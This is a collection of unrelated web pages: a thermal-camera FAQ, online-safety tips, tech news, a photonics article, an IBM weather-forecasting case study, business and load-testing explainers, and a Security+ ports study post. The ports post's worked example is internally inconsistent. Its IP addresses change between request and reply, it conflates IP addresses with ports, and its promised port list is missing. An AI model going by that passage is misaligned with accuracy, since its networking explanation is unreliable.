We recommend using the Mobotix M16-Thermal-TR or S16-Thermal-TR series and to configure the cameras to generate events when detecting a temperature higher than 38°C (100.4°F). Security Center can receive custom thermal events generated by this camera.
Axis Thermal Camera Q2901-E, using the HTC (Human Temperature Control) ACAP (Axis Camera Application Platform)
This ACAP is developed by an Axis technology partner, Grekkom, and it can be used to detect elevated skin surface temperatures. In evaluating this camera as a possible solution, consider the following statement from the AXIS website:
Under specific conditions, some Axis thermal cameras are capable of precise temperature measurements, but they are not designed by Axis for the specific intention of human fever detection nor the diagnosis, mitigation or prevention of disease or health conditions. Thus, Axis thermal cameras are, for example, not approved by FDA in the US for this use.
Do I need a special license in Security Center for thermal cameras?
No. Thermal cameras use a regular camera connection license in Security Center.
How do I set up a thermal camera as a triage device?
Recommendations vary among camera manufacturers. We recommend following these general guidelines to best prepare you for a typical installation.
- Set up a checkpoint, using a physical gate or turnstile, so that the person is forced to stop in front of the thermal camera for a few seconds. This way the camera can correctly measure the temperature.
- Make sure that people pass in front of the camera one at a time.
- The person whose temperature is being measured needs to be approximately 1 m (3.28 ft.) away from the camera.
- The camera needs to be installed indoors so that the ambient temperature and humidity can be controlled.
- To help ensure ambient temperature, we recommend not to install the camera close to a door.
- For accurate results, point the camera to a person's forehead when measuring their temperature. All headgear must be removed.
- Know that the human body emissivity is approximately 98%. You need this emissivity reading when calibrating your thermal cameras.
- The event threshold should be higher than 38°C (100.4°F).
- People that trigger an alarm should be tested further, using FDA-approved equipment.
- Calibrate the thermal camera daily.
- When calibrating the camera, remove any nearby objects that can negatively affect the calibration (for example, a hot drink).
- Always use the latest firmware available for the camera. Doing so increases the chances of getting accurate results.
To learn more, watch this video about fever detection guidelines from our Genetec™ Podcast Series. | <urn:uuid:76ce857e-ff77-4ea0-af52-bfd678a3a7ea> | CC-MAIN-2022-40 | https://techdocs.genetec.com/r/en-US/FAQ-about-thermal-cameras | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00587.warc.gz | en | 0.90043 | 1,019 | 2.796875 | 3 |
This week is National Consumer Protection week and as while there are many threats to our user data and personal information, there are also a multitude of ways we can protect ourselves. Some examples of best practices are:
- Using a credit card rather than debit card - this prevents you from needing to enter a pin in public where people can visually capture your input.
- Using Apple or Google Pay - these applications store your credit card so you do not need to physically access the card to use it.
- Using a unique PIN for debit cards - not reusing this pin for unlocking cell phones or as voicemail codes, etc.
- Never sharing passwords, account access, and credit or debit cards with others.
There are other, more advanced threats to the security of your devices. It is important to be aware of them as this increases your ability to protect yourself from them.
It's Consumer Protection Week - Here's 4 Ways to be Safer Online
There are far more than four approaches to staying safe in an online environment, but these ideas can be implemented immediately. Most importantly, remember to slow down when you are feeling pressured. Hackers often use scare tactics to appeal to your emotional, and less rational, feelings to get you to act without thinking. If you stop and think about what is going on before reacting, you will be less likely to make a big mistake.
Reduce the amount you rely upon search
Search became the answer for all our woes years ago. Can't remember where you stored a file? Forgot the name of the file or when it was created? Can't figure out where a setting went? Not to worry, search to the rescue! The problem with using search this way is that it allows us to pay less attention to what we are doing. We rely upon, or anticipate using search later, which makes us lazier as we are confident search will provide what we need.
Where this can hurt us is relying upon search to find company websites. It would be challenging to find someone who has never experienced clicking on a website result only to find it was not what we were looking for. This is not a big deal when searching for a specific item not tied to a company. However, for banking and other websites that would need to collect personal information, this is much riskier. If you imagine the drive home from work and how easy it can be to forget part of the trip, this is what can happen when we use search all the time - we forget to stop and consider what we are clicking.
The fix: Bookmark the correct site instead of searching and absently clicking on results.
Don't click or call the number in popup warnings
Popup warnings are different from ads and website interactions like subscribing to a newsletter or signing up for a coupon. By contrast, these are the warnings claiming your computer has been infected and you need to call (enter the company here) so they can fix your computer. Oftentimes they pretend to be Microsoft or other reputable companies to encourage people to call. Unfortunately, these popups use shady scare tactics to convince people to let them connect remotely when you otherwise would not.
What is important to know is that getting a popup that you have been infected does not guarantee you have been infected. In other words, a popup can claim anything but it does not make it true. People who call are encouraged to allow the company to connect remotely so they can "clean their computer". At this point typically one of two things happens. The user either overpays for software to remove malware from their computer that likely never existed in the first place, or worse case, this is when the real malware is installed.
The fix: Close the web browser. If the popup returns, reset the browser to factory settings or if necessary, uninstall the browser and reinstall it.
Most importantly, do not ever let someone remotely connect to your computer unless you know who they are and trust them. Remote control software was created for a great purpose - to allow technicians to help people without physically being in the same location. It can also be used to run updates and install software when users are not actively on their computers, as is the most common case with businesses. Unfortunately, those settings that make it great for remote tech support also make it dangerous when misused.
Look for more than the lock symbol next to a website
This is important because we have all been taught to look for the lock symbol next to a website to be confident the site is encrypting our data before transferring it. Unfortunately, it is not enough for a website to have this symbol. The symbol means a security certificate has been purchased for the domain. However, it does not mean it is a trustworthy website or that it is safe to enter your information.
As an example, Wells Fargo's website is wellsfargo.com. If you were unknowingly redirected to wellsfargo.online.com and someone made this fake site look just like Wells Fargo's website, you might be tricked into entering your credentials. In situations like this, the lock symbol does not protect you because you are submitting your information directly to the hackers. While the lock does show the site is secure, if you are using the wrong site, your information is still at risk.
The fix: Always be sure to check the URL before entering your credentials. This is especially important when using search or clicking on links in email, which I recommend doing cautiously. It is easy to be redirected without realizing it. Check the URL in its entirety provides the greatest likelihood you will never fall for this trick.
Go directly to a site rather than clicking on a link in an email
Last but not least, clicking on links in emails can be very risky. There are examples of emails with safe links including, but not limited to:
- Newsletters you have subscribed to and trust
- Emails received after clicking a link on a website to reset a password or recover an account
- Deals or product information emails from companies you trust and that you actively signed up to receive
Aside from emails you are expecting or have consented to receive, use caution clicking on links. This is especially true of threatening emails or emails using scare tactics like you need to change your password because there was a data breach, etc. Keep in mind, a link's text can be anything and the destination link might not match the text.
A hyperlink contains two parts: the text describing the link and the actual link destination. The text may look like this: "Check out our sale now!" and appear to have come from a company you subscribe to, but the hyperlink could be pointing to a nefarious website hoping to gather your personal data.
The fix: Hover over the link to see where the link is really going. Instead of using the link, go to the site directly or call the company to see if there really is a problem with your account. The more we notify companies of scams like this, the better they can inform other customers and the safer we will all be.
During the National Consumer Protection Week, and every week, it is important to do your best to protect yourself. Going directly to websites rather than using search, checking to make sure you are at the correct website before entering your credentials, refusing to click on ads using scare tactics and using caution with links in emails are ways you can protect yourself from common attacks schemes happening all the time.
As always, knowing what form an attack may take will better help you identify the risks so you can avoid them rather than becoming a victim! | <urn:uuid:c648115c-f18b-4b22-8e7e-d9dcd68654c1> | CC-MAIN-2022-40 | https://blogs.eyonic.com/its-consumer-protection-week-heres-4-ways-to-be-safer-online/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00587.warc.gz | en | 0.952107 | 1,536 | 2.671875 | 3 |
Toy company Mattel has partnered with Tynker, a computing platform, to bring coding to 10 million children internationally by 2020, according to a company announcement. The companies plan to introduce seven Barbie coding lessons to inspire young girls to look at careers as a pet vet, astronaut or robotics engineer.
The two companies formerly partnered in 2015 with the Hot Wheels and Monster High "programing experiences," which were brought to nearly 4 million kids.
The company is hoping to connect kids to coding "through Mattel characters they know and love," which could then help ignite a desire to pursue a more technically-based career, according to Sven Gerjets, CTO of Mattel.
Female representation in the technical workforce is dismal, particularly in cybersecurity. A mere 11% of the cybersecurity workforce is women, and companies like Mattel and Tynker are taking notice.
Exposing young children to a skill that is rapidly growing is pertinent to maintaining a healthy future workforce. Finding the right kind of leverage, whether it be through Girl Scout badges or Barbie, is also critical.
A combination of education and marketing is key in creating an inviting perception of IT. Currently, a lack of female representation in the technical workforce is one of the deterrents for young women pursuing a path in tech despite 62% of young women regarding those in the field as "highly intelligent."
Even with noted female representation, 60% of young women say they don't have enough experience in coding and therefore have a natural resistance to the field. If toy or children's company like Mattel were to continue to initiate programs that intertwine the love of childhood characters with skills needed in the 21st century, then a natural interest will arise.
If a Shamu-trainer Barbie can inspire a child to swim with a killer whale, a coding Barbie can certainly create a similar desire for tech. | <urn:uuid:df5c9017-e1d3-45d6-a03e-82ba7c629fce> | CC-MAIN-2022-40 | https://www.ciodive.com/news/barbie-is-going-to-teach-young-girls-to-code/517507/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00787.warc.gz | en | 0.955303 | 393 | 2.640625 | 3 |
By Tom Williams | Posted on January 15, 2018
After years of future promise, silicon photonics (SiPh) technology is ready for prime time — having made the transition from promise to production. With an increasing demand for more network capacity, cloud, content, and service providers want optical modules that reduce power, size, and cost. SiPh is now being used in a wide range of coherent optical interfaces, from metro and long haul to submarine data transport, to enable high-density form factors and excellent performance.
Silicon photonics can enable reduced development time, higher levels of integration, and fewer manual assembly steps than more traditional optics. The result? A powerful, easier-to-manage product that empowers cloud, content, and service providers to stay ahead of increases in network capacity demand.
Silicon-based photonic integrated circuits (PICs), which integrate all the high-speed optics necessary for both transmit and receive functionality, enable the density required for pluggable coherent modules. These PICs include the optical polarization-controlling functions that may require external components when integrating using Indium Phosphide (InP). By reducing the number of active alignment steps, SiPh-based products improve yield and ramp more efficiently.
While metro applications served as the primary market for SiPh’s initial service provider network implementations, SiPh is used in long-haul — even submarine — applications today. The submarine market has always required high-performance technology, even if it came at higher price points. Combining SiPh with high-performance digital signal processing (DSP) technology enables submarine-network performance equal to or better than the more expensive, discrete component-based approaches (Figure 1).
Figure 1. The coherent SiPh PIC reduces cost and size versus the use of more expensive, discrete components.
That said, InP technology remains important for laser functionality. But separating that laser function from the high-speed optics can produce several benefits. For example, InP generally requires thermo-electric coolers (TECs) to maintain tight temperature stability. SiPh, on the other hand, can operate over a wide temperature range with no impact on performance. The high-speed interface is optimized by putting the optics close to the DSP and moving the laser further from the DSP, where the TEC doesn’t have to work as hard to maintain constant chip temperature.
Silicon photonics provides further benefits
Using SiPh in coherent applications creates products with rich feature sets that offer high density and pluggability.
There are a number of reasons why SiPh has proven well suited for many applications, including coherent optics:
- Yield: Beyond improving manufacturing costs, high yield reduces development time by limiting the number of variables during prototyping. When working with low-yield optics technologies, it is difficult to determine if performance limitations derive from design defects or process variation. At higher levels of integration, this uncertainty is compounded. When developing complex PICs with many integrated functions, it is imperative to know that the individual building blocks are well understood and repeatable. These attributes enable the designers to focus on optimizing the interfaces between each function.
- Polarization Control: Coherent transmission increases the data rate via polarization multiplexing – two orthogonal polarizations are transmitted simultaneously at the same wavelength. This approach requires transmit and receive components that can manipulate the polarization state of an optical signal. When working with InP, polarization control is usually done using external components. Not only do these extra components increase material cost, they also add extra alignment steps that integration of these polarization control functions in the SiPh PIC can eliminate.
- Thermal Operating Range: As mentioned previously, InP components are sensitive to temperature variation and must be mounted on a TEC. Since TECs have a limited control range, they fundamentally limit the operating temperature range of InP components. In addition, TECs consume significant power in cooling mode, where the thermal design is most challenging. By comparison, the optical characteristics of SiPh vary little over temperature. SiPh doesn’t require a TEC and supports a wide operating temperature range.
- Humidity: Traditional optics degrade in high-moisture environments. For this reason, optics are packaged in vacuum-sealed gold boxes. These hermetic gold boxes contribute significantly to the cost of optical interconnects, particularly when they require high-speed interfaces. In addition, hermetic seals are historically one of the most common sources of failure for optics. Silicon is well known to be insensitive to humidity. Millions of silicon electronic components are shipped every year in non-hermetic plastic packages; moving optics to non-hermetic packaging is an important step for the industry.
- Wafer Level Testing: In addition to having higher yields than traditional optics materials, SiPh can also be tested at the wafer level. Good die can be identified early in the process, and there is no labor wasted on material that will ultimately fail. Wafer-level test is commonplace in high-volume electronics applications, but new to the world of optics.
- Wafer Size: Leveraging mature silicon process technologies means that much larger wafers can be made in silicon than traditional optics materials. Three-inch wafers are state of the art for InP fabs. Today’s SiPh runs on lines that accommodate 8-inch wafers or larger. These larger wafers result in an order of magnitude more die per wafer, which lowers cost.
- Package Level Integration: As the industry continues to move toward higher data rates and lower power, the interface between the DSP and optics is quickly becoming a bottleneck. Every time a high-speed signal needs to transition across an additional interface (IC package or pluggable connector) there is loss and distortion. Compensating for this additional loss adds power dissipation, and distortion limits performance. Using SiPh enables package-level integration that can better optimize these high-speed interfaces and accelerate the realization of higher data rates at lower power.
Leveraging silicon photonics
Understanding SiPh’s benefits, how do we best use them to drive innovation? Today’s optics architecture is optimized for client interfaces in which the laser is directly modulated. This model is easily extrapolated to external modulation when the modulator technology has the same thermal and packaging limitations as the laser. Thermally sensitive components that need a TEC to maintain a constant temperature are unlikely to be integrated with a DSP chip that also dissipates power.
On the other hand, when working with SiPh, designers can optimize the high-speed interface and separate the thermally sensitive laser. For example, the laser can be placed on another part of the line card and connected to the high-speed optics through an optical fiber. This architecture enables greater thermal flexibility, a high-speed signal path with superior signal integrity, and elimination of costly hermetic packages with high-speed interfaces (see Figure 2).
Figure 2. High-speed electro-optical package integration.
SiPh and coherent are two technologies shifting the landscape of optical communications in parallel. By moving to architectures that can optimize the benefits of each, it can be possible to have the same kind of impact on access networks as we have already seen in applications from the metro core through to submarine. Using a toolbox that includes SiPh and coherent DSP technology, designers can leverage complicated modulation formats, high baud rate, and highly integrated parallel optics to optimize designs for a wide range of applications.
Ball Grid Array Packaging Technology
The transition to low-cost packaging and standard interfacing is an important next step to further the benefits of SiPh technology. As the industry moves toward 600-Gbps capacity per wavelength using higher baud rate and higher order modulation formats, traditional packaging technology can limit performance of the interface between the DSP and optics. Ball grid array (BGA) packages address this challenge by eliminating additional connectors and optical package leads, improving bandwidth and signal integrity.
Here and now
SiPh is no longer a technology of the future. Coherent modules based on highly integrated SiPh PIC technology have been deployed in applications ranging from data center interconnects to submarines. In the next phase of maturity, the industry is learning to understand how to best leverage the benefits of SiPh to achieve the pace of innovation necessary for optical networking to meet the worldwide data traffic demands that such applications as cloud computing, 5G, and the Internet of Things will drive.
Tom Williams is Senior Director of marketing at Acacia Communications. Before joining Acacia, Williams spent 14 years at Finisar Corp. (initially with Optium, which Finisar acquired in 2008), where he was director of product line management for coherent and direct detect transport products above 100 Gbps. He has also held positions at Lucent Technologies and Northrop Grumman Corp. He has an MS in electrical engineering from Johns Hopkins University and BS degrees in electrical engineering and physics from Widener University. | <urn:uuid:e9a5896a-d85b-43ae-91d0-95cfa4e48217> | CC-MAIN-2022-40 | https://acacia-inc.com/blog/applications-widen-for-silicon-photonics-paired-with-coherent-transmission/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335124.77/warc/CC-MAIN-20220928051515-20220928081515-00787.warc.gz | en | 0.911998 | 1,850 | 2.640625 | 3 |
If you’re planning to take the Security exam you should have a basic understanding of Security+ ports. Questions continue to appear in the Security+ exam.
There are 65,536 TCP and 65, 536 UDP ports. The first 1024 (0 to 1023) are well known ports and commonly used with default protocols. For example, the default port for HTTP is port 80 and the default port for HTTPS is 443.
Understanding Port Usage
Here’s a short explanation of how the ports were used when you accessed this Web page. When you clicked a link for the blog, your computer created the request and put it into a packet with source and destination IP addresses and ports. The IP address of GetCertifiedGetAhead.Com (the destination) is 220.127.116.11 and since HTTP is used, the destination port is 80.
Your computer then identified an unused port in the dynamic and private port range (49,152 to 65,535) and mapped it to your Web browser for this request. For this explanation, imagine that it picked 49,152. Additionally, imagine that your computer (the source) has an IP address of 18.104.22.168. Here’s what we have:
- Destination IP: 22.214.171.124 (the GetCertifiedGetAhead.Com server)
- Destination Port: 80
- Source IP: 126.96.36.199 (the client’s system)
- Source Port: 49152
Another way of looking at the destination port from the client’s perspective is that it is an outgoing port. If you want to block outgoing HTTP traffic, you can block port 80 at your network firewall. On the other hand, the source IP is an incoming port from the server’s perspective. If you want to block incoming HTTP traffic, you can block incoming port 80.
TCP/IP then used the destination IP to get the packet to the GetCertifiedGetAhead.Com Web server. When the server received the packet, it looked at the destination port (80) and sent the packet to the service handing the HTTP protocol (the Web server application).
The Web server formatted the Web page, and sent it back to your computer. In this case, the destination IP addresses and ports are swapped and would look like this:
- Destination IP: 188.8.131.52 (the client’s system)
- Destination Port: 49152
- Source IP: 184.108.40.206 (the GetCertifiedGetAhead.Com server)
- Source Port: 80
TCP/IP used the destination IP to get the packet back to your system. When the packet arrived, your system looked at the destination port and saw that it is mapped to your Web browser. It then forwarded the packet to your Web browser to display. Of course, the Web page may have been sent in several packets, but each packet used the same process.
Know These Security+ Ports
Ports are used the same way for multiple services. Some of the common ports you should know are:
Remember, you can memorize these ports and then write them down as you start the test. If you get any port questions, you only need to look down at your notes to answer the question.
Here’s another link on Security+ ports that breaks down the ports in different categories and also identifies if they use TCP or UDP.
Other Security+ Study Resources
- Security+ blogs organized by categories
- Security+ blogs with free practice test questions
- Security+ blogs on new performance-based questions
- Mobile Apps: Apps for mobile devices running iOS or Android
- Audio Files: Learn by listening with over 6 hours of audio on Security+ topics
- Flashcards: 494 Security+ glossary flashcards, 222 Security+ acronyms flashcards and 223 Remember This slides
- Quality Practice Test Questions: Over 300 quality Security+ practice test questions with full explanations
- Full Security+ Study Packages: Quality practice test questions, audio, and Flashcards | <urn:uuid:56f5f53d-b742-41ce-9600-3512f6b0b1a3> | CC-MAIN-2022-40 | https://blogs.getcertifiedgetahead.com/understanding-ports-security-2/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335124.77/warc/CC-MAIN-20220928051515-20220928081515-00787.warc.gz | en | 0.887965 | 850 | 3.21875 | 3 |
The challenge of predicting weather accurately
Weather forecasting in the United States and other developed nations is more accurate than in other more remote parts of the world. The Weather Company saw an opportunity to advance accurate weather predictions globally by leveraging the IBM GRAF.
The transformation of accurate weather forecasts
The Weather Company produces more precise and often more accurate weather forecasts by running higher resolution and more computationally intensive weather models on the latest technology that incorporates IBM Power System AC922 equipped with NVIDIA V100 GPUs.
IBM GRAF results
5xfaster running on IBM Power System AC922 with NVIDIA GPUs vs. x86-based servers
15 Hourweather predictions updated every 1 Hour
Increasingforecasting precision from 15km to 3km
Business challenge story
The art of weather forecasting
Weather affects every inhabitant on Earth, every day. It influences what people do, where people travel, what people eat, and even how people feel. More accurate weather forecasts help make more informed daily decisions and keep people out of danger.
In 2016, IBM acquired The Weather Company, a provider of hyperlocal weather forecasts. This acquisition brought together IBM’s powerful cognitive analytics capabilities and The Weather Company’s extremely high-volume data platform that ingests, processes, analyzes and distributes enormous data sets at scale in real time. Today, The Weather Company delivers around 25 billion forecasts daily and personalized weather data and insights accessible at your fingertips on various platforms like The Weather Channel app and weather.com. In addition, The Weather Company helps millions of consumers and businesses make better decisions as the leading provider of weather-driven business solutions to media, aviation, energy and utilities, insurance and government sectors.
The Weather Company, along with most meteorological services in the world, deploys numerical weather prediction (NWP) technology on supercomputers for weather forecasting. The Weather Company realized that with the addition of high-speed GPU technology they could accelerate weather prediction in order to generate global, high-resolution weather forecasts for the next 15 hours, updating those forecasts every hour. To achieve its goals of running more precise, complex and computationally intensive weather models, they required a supercomputer solution with ultimate speed and scale.
As Todd Hutchinson, head of Computational Meteorological Analysis and Prediction at The Weather Company, explained: “The Weather Company is looking to run the latest weather prediction models at high resolution over the entire world. Higher resolution gives more details in the forecast and resolves features that affect everyday weather, like thunderstorms, which are more difficult to forecast. To make this possible, The Weather Company needs computing capabilities that are cost effective from a capital, energy and data center footprint point-of-view to run these models which require significant computational resources.”
Transforming weather insights into actions
Redefining accurate weather predictions with IBM GRAF
The Weather Company was accustomed to running weather models on conventional x86-based clusters. Although, to continue raising the bar for weather predictions, they needed to build upon their 15+ years of regional weather modeling to expand towards global weather models. TWCo decided to implement the Model for Prediction Across Scales (MPAS) atmospheric model.
“Our goal is to improve our weather forecasts by running weather prediction models at higher resolution, more frequently, and globally. To do this, we are utilizing the hardware and software platforms that are available now from IBM and NVIDIA.” – Todd Hutchinson
Historically, weather models were developed on homogenous CPU-only systems, but as the industry embraces heterogeneous systems that take advantage of specialized accelerators to drive performance improvements, existing code needed to be ported over to GPUs to see those gains. These legacy codes and applications can be decades old, which created challenges in enabling them for GPUs. Since MPAS is a more recent model, some of these barriers were eliminated. By using OpenACC directives and other tools from PGI such as PCAST (PGI Compiler Assisted Software Testing) to diagnose and optimize MPAS, the team was able to successfully port all dynamics routines and an entire suite of physics parameterizations to enable acceleration of an entire weather forecast using GPUs.
To accelerate their capabilities, The Weather Company worked with IBM to design and purchase a high performance computing system based on IBM Power System AC922 servers. The Power System AC922 is the world’s best server for enterprise AI training, and the IBM POWER9 processor at the heart of the AC922 includes the industry’s only CPU-to-GPU NVIDIA NVLink interface, allowing the server to get up to 5.6x greater bandwidth between its incorporated NVIDIA V100 Tensor Core GPUs to deliver faster time to insights.
Todd Hutchinson: “Ultimately, there were a few reasons that we selected IBM Power Systems. First, while most weather models were built before the introduction of GPUs within supercomputing, the weather model that we’re working with (MPAS) is relatively new and was written by the National Center for Atmospheric Research (NCAR) using modern software standards. Researchers at the Computational Information Systems Laboratory at NCAR and the University of Wyoming were working to port MPAS to GPU using OpenACC. With additional support, they felt that they could port the entire weather model to GPU and gain a significant speedup as compared to running on CPU. With that effort ongoing between NCAR and The Weather Company and with the capability of GPUs on a cluster that IBM was able to build for us, it enabled us to move forward with IBM Power Systems.”
The results of having better weather data
Weather forecasting of the future
IBM Global High-Resolution Atmospheric Forecasting System (IBM GRAF)
In January 2019, TWCo revealed a new powerful global weather forecasting system would go live later in the year to provide the most precise local weather forecasts worldwide. The new IBM Global High-Resolution Atmospheric Forecasting System (IBM GRAF) will be the first hourly-updating weather system that is able to predict something as small as a thunderstorm anywhere on the planet. Compared to existing models, IBM GRAF will provide a 9x increase in forecast points across the world.
The new weather system, IBM GRAF, will become available Fall 2019. With the IBM Power System AC922 plus NVIDIA V100 GPUs, The Weather Company can make significantly more calculations within the weather model, and thus provide more frequent and accurate weather predictions globally, in locations that typically don’t have access to detailed forecasts.
As Todd Hutchinson mentioned, “While weather forecasting in some parts of the world such as the United States is quite accurate and timely, weather forecasting is often not nearly as precise or accurate in many other parts of the world. In most areas, weather models run at relatively coarse resolutions of 10-15km and update only once every 6 hours. Often, the latest weather forecast is based on information that is up to 10 hours old. With IBM GRAF, forecasts for most areas of the world will be fine-scale (3km resolution) and will be updated with the latest available data every hour. The benefits of IBM GRAF will be seen in the forecast for the coming 15 hours. So, for example in areas such as Africa, South America and much of Asia — in the morning we will have a much better opportunity to determine whether a particular location is likely to be affected by thunderstorms throughout the coming day.”
What’s next? The Weather Company will not only improve weather predictions to help people and communities better plan for upcoming weather conditions but will also help millions of industries such as retail, utility, aviation, insurance, airlines and others. In terms of airlines, IBM GRAF will be able to provide more effective routes around turbulence. As Todd Hutchinson explains: “We will diagnose turbulence using output from GRAF in order to provide forecasts of where turbulence is likely to occur, so that airlines have the opportunity to route around areas of expected turbulence.”
The Weather Company
The Weather Company is an IBM business – bringing together IBM’s advanced AI and cloud capabilities with The Weather Company’s high volume of weather data. This powerful combination helps people, businesses and communities around the world prepare for and mitigate the cost of weather. The company offers the most accurate weather forecasts globally–more than 25 billion per day–with personalized and actionable weather data and insights. The Weather Company is committed to trust and transparency, and The Weather Channel app and weather.com, as well as Weather Underground and wunderground.com are trusted by hundreds of millions of people to provide accurate, timely forecasts that help them make critical decisions every day. For more, visit https://newsroom.ibm.com/the-weather-company
Take the next step with the IBM GRAF weather model
To learn more about IBM Power System AC922 with NVIDIA GPUs, please contact your IBM representative or IBM Business Partner, or visit the following website: https://www.ibm.com/us-en/marketplace/power-systems-ac922. Or, read more client success stories to learn how others have put IBM’s solutions to use and got major results. | <urn:uuid:ccac7662-0961-47ee-b78d-a6e59c9a649e> | CC-MAIN-2022-40 | https://www.ibm.com/case-studies/ibm-graf-from-the-weather-company | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00787.warc.gz | en | 0.93404 | 1,887 | 2.640625 | 3 |
In today’s fast-paced and highly competitive market, enterprises are looking for ways to gain an edge over their competitors through the use of technology in their businesses. Technology has become so sophisticated and ubiquitous that it is nearly impossible for enterprises to be successful without using technology to its full potential. To bridge the gap between business and technology, an enterprise needs the expertise of a business technologist.
Who is a Business Technologist?
A business technologist is an IT (information technology) professional with a combination of broad general knowledge of technology along with soft skills and business skills. Most importantly, they have a deep understanding of how to integrate technology into strategies that align with business outcomes and drive competitive advantage.
The basic concept behind a business technologist is a hybridized talent of sorts. You need to be skilled at both technology and business, and those skills need to work in tandem with one another. At their core, some business technologists are citizen developers—employees who don’t just consume technology but can also create it. While not all business technologists are citizen developers, all citizen developers are business technologists. These professionals have technical skills as well as industry-specific knowledge; they not only understand how to develop tools but know what to develop for particular business needs using low-code development tools or APIs (application programming interfaces).
What Does a Business Technologist Do?
An experienced business technologist can help move an enterprise forward by increasing collaboration among departments and streamlining workflow, all while reducing costs by making technology more efficient and scalable. Here are some functions of a business technologist.
Monitoring industry trends and developments
A business technologist may not spend all day keeping up with industry trends and developments. However, they regularly monitor publications related to their field of expertise to stay abreast of any changes in relevant laws, regulations, case law, scientific developments, and more that might affect potential business operations.
Understanding how technology impacts different industries and sectors
Understanding key differences between industries, sectors, and enterprises allows them to shape technology proposals to their specific needs and ensure full alignment with business strategy.
Envisioning the future of technology for their company and redefining business processes
A business technologist envisions new ways to use technology in their enterprise and create systems that can improve efficiency and effectiveness over time. They also redefine business processes, so they are able to incorporate new technologies or leverage existing ones in novel ways to make certain activities more streamlined and efficient.
Advising top management on potential technology investments
Since they understand how best to apply new technologies to different business functions, they can advise top management about whether it makes sense for them to invest in certain products or services at different points along their lifecycle.
Why They Are Needed
The proliferation of powerful technologies has led to a culture shift in how technology is leveraged within organizations. This has been dubbed the age of democratized technology, where a once-complicated developer skill set is becoming accessible to all. It’s now possible for citizen developers (regular businesspeople) to download powerful applications and frameworks, then utilize these tools to create customized solutions that meet their needs without needing technical assistance from IT professionals. This cultural shift has created an increased need for those with access to business and technology knowledge (business technologists) to integrate technology into effective business processes.
How Enterprises Can Benefit from Having Business Technologists
Business technologists can improve productivity, efficiency, and decision-making capabilities by unifying enterprise systems. Not only do business technologists have a holistic view of how technology supports an organization’s goals, but they also keep up with technological innovations to anticipate needs for future business operations.
A business technologist focuses on applying technology as a key enabler for delivering better customer outcomes, reducing costs, increasing efficiencies, and improving employee satisfaction within a business environment. This value proposition is what differentiates business technologists from other professionals who work in IT.
What Skills Do Business Technologists Need?
Business technologists must have the following qualities:
- Big-picture outlook: They have the ability to see how technology can be applied across an entire business in order to optimize efficiency, from marketing and sales to client and partner management, product development, and delivery.
- Data cruncher: They are someone who really understands numbers, crunching raw data into valuable information about customers and markets for both strategic decisions and tactical campaigns.
- People person: A business technologist has a strong sense of what motivates others within a business environment and helps ensure smooth execution.
- Ideation: They have the ability to bring creativity to projects through brainstorming sessions and idea creation; they foster creativity among team members with inspiring leadership abilities.
- Long-term vision: They can predict which technologies will become outdated, so they don’t waste resources developing them now.
- Knowledge of technology and digital media: A business technologist should understand how both core systems work as well as each major application solution that runs on top of those core systems (e.g., customer relationship management, enterprise resource planning, marketing automation, accounting solutions, etc.). Business technologists should be able to identify what a business problem is or could be and formulate a solution on how that could be solved by better integrating all these applications together or leveraging more streamlined solutions which meet most, if not all, requirements already available in the marketplace.
- Understanding of process flow and methodologies: A business technologist should know about how complex processes operate in businesses across all industries from finance to human resources, marketing, research & development, etc.
The Future of Business Tech in an Enterprise
The pace of change in business has accelerated to such a degree that business technologists will become an indispensable resource in order for organizations to keep up with new developments and technology trends. This is true whether you’re an entrepreneur starting out or a seasoned CEO trying to navigate through a shifting economy.
The reality is that over time, almost every industry will be transformed by digital disruption as entire marketplaces appear and evolve so quickly that their lifespan becomes nearly nonexistent. In order to stay ahead of these challenges—and harness them—business leaders need skilled technologists who can partner with them to stay abreast of changes and pivot when necessary.
Today, businesses need someone whose expertise cuts across different platforms, such as cloud computing, enterprise social networks, app development, data analytics, and more. More importantly, they must have experience strategizing with senior leadership, showing how each piece of emerging technology can make an impact in an enterprise. Every enterprise needs a digital game plan today if they want to compete tomorrow—and having a business technologist can help lead your enterprise there.
Read next: Top 10 In-Demand IT Certifications 2021 | <urn:uuid:c20456ab-6b93-4115-ac45-a602c3cef9ae> | CC-MAIN-2022-40 | https://www.itbusinessedge.com/business-intelligence/why-business-technologists-are-becoming-indispensable/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00787.warc.gz | en | 0.948064 | 1,373 | 2.640625 | 3 |
Before a software product can be brought to market, it must go through numerous tests to determine if it is working correctly. Some common types of software tests include bug tests, performance scans, and functionality verification. Load testing is one of the most common software tests run on systems and applications. So what is load testing? We’re glad you asked.
What is Load Testing
Load testing is a type of system test that determines how well an application or system performs under normal or anticipated peak conditions. Software load tests send virtual users or requests to the system to determine how well it handles the traffic/requests.
Load testing is similar to stress testing. Stress testing, however, pushes the product past anticipated limits to determine the maximum number of users or requests a product can handle before it breaks. Stress tests take it past expected levels into the realm of unrealistic demands. Load testing only pushes the product to within expected or peak capacity levels. Load testing must take place near the end of the development cycle. Essentially, a system can’t be tested from the end-user perspective until it’s complete.
Why is Load Testing Important
Load testing mimics the way a system or application acts when deployed as a finished product. It helps developers determine if the system behaves as intended. It can also help identify issues like pages not loading correctly, lag time, downtime, and overall performance problems.
Companies must protect their brands. They should never deploy an application or system that isn’t working well. If you launch a website, it should work right for everyone. You don’t want it to crash when the 1,000th person visits the site lest your company look bad or unreliable. The purpose of load testing is to help a company determine if the system or app is ready to deploy and that it can handle all anticipated traffic.
Load testing finds issues before the product hits the market, which gives developers the time they need to correct them. Retesting must occur every time the software changes.
Consider Outsourcing Your Load Testing Needs
Outsources QA teams are an excellent option for organizations that don’t have the resources necessary to keep meet the demands of quality assurance testing. Qualified quality assurance testing labs understand what is load testing and why it is so vital to growing websites.
